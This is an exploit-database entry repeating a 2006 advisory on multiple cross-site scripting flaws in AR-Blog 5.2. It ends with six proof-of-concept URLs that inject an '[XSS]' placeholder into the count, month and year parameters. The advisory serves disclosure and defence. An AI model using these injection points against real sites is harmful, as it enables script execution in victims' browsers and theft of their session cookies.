AR-Blog 5.2 - Multiple Cross-Site Scripting Vulnerabilities

EDB-ID:

27910

CVE:

N/A




Platform:

PHP

Date:

2006-05-27


source: https://www.securityfocus.com/bid/18120/info

AR-Blog is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. 

An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

AR-Blog 5.2 is reported vulnerable. Other versions may be affected as well.

http://www.example.com/path/index.php?page=gb&count=next=[XSS]
http://www.example.com/path/index.php?page=gb&count=[XSS]
http://www.example.com/path/index.php?page=showtopis&month=mo&year=Year_the_news=[XSS]
http://www.example.com/path/index.php?page=showtopis&month=mo&year=[XSS]
http://www.example.com/path/index.php?page=showtopis&month=mo=[XSS]
http://www.example.com/path/index.php?page=showtopis&month=[XSS]